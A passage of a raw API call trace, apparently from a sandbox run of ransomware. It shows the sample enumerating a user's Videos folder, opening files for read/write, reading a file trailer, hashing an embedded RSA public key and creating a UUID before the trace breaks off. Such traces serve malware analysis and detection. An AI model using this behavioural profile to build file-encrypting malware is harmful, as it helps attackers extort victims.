returned 1 [0194.261] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\") returned="-DwrKzslsF2\\" [0194.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d422f8 [0194.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0194.262] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0194.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d422f8 | out: hHeap=0x6a0000) returned 1 [0194.262] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.262] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.262] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.262] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.262] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.263] PathFindFileNameW (pszPath="") returned="" [0194.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.263] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcaaf7440, ftCreationTime.dwHighDateTime=0x1d8a0c4, ftLastAccessTime.dwLowDateTime=0x6b339510, ftLastAccessTime.dwHighDateTime=0x1d8a15e, ftLastWriteTime.dwLowDateTime=0x6b339510, ftLastWriteTime.dwHighDateTime=0x1d8a15e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0194.265] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.266] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcaaf7440, ftCreationTime.dwHighDateTime=0x1d8a0c4, ftLastAccessTime.dwLowDateTime=0x6b339510, ftLastAccessTime.dwHighDateTime=0x1d8a15e, ftLastWriteTime.dwLowDateTime=0x6b339510, ftLastWriteTime.dwHighDateTime=0x1d8a15e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.266] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd779f420, ftCreationTime.dwHighDateTime=0x1d89e6c, ftLastAccessTime.dwLowDateTime=0x3c2a9d80, ftLastAccessTime.dwHighDateTime=0x1d8a542, ftLastWriteTime.dwLowDateTime=0x3c2a9d80, ftLastWriteTime.dwHighDateTime=0x1d8a542, nFileSizeHigh=0x0, nFileSizeLow=0xf849, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bsT5mSuptc.flv", cAlternateFileName="BST5MS~1.FLV")) returned 1 [0194.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0194.266] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.266] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\bsT5mSuptc.flv") returned=".flv" [0194.266] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\bsT5mSuptc.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\bst5msuptc.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.267] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=63561) returned 1 [0194.267] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.270] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xf823, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.270] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.272] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.272] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.272] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.272] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xf849, lpOverlapped=0x0) returned 1 [0194.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.274] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.274] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0194.275] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.275] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.275] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.275] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.275] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.275] GetLastError () returned 0x0 [0194.275] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0194.275] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0194.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.276] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.276] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0194.276] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf850) returned 0x2d49778 [0194.276] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d422f8 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42340 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fb8 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a000 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.277] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.278] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0194.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a000 [0194.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0194.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39fe8 [0194.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0194.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x6d5c88 [0194.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0194.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0194.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0194.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0194.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0194.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0194.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.279] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0194.280] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0194.280] GetCurrentThreadId () returned 0x264 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46240 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.281] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.281] GetCurrentThreadId () returned 0x264 [0194.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0194.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.282] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0194.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0194.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0194.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a08 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a048 [0194.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0194.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0194.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0194.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a000 [0194.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0194.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0194.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a060 [0194.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0194.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.284] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0194.284] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a018 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a078 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a018 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39fe8 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a048 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a078 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0194.285] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0194.285] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0194.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0194.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0194.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0194.286] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0194.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0194.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0194.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0194.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0194.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0194.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0194.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0194.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a018 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a060 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a000 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0194.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0194.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0194.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0194.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0194.290] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42340 | out: hHeap=0x6a0000) returned 1 [0194.290] 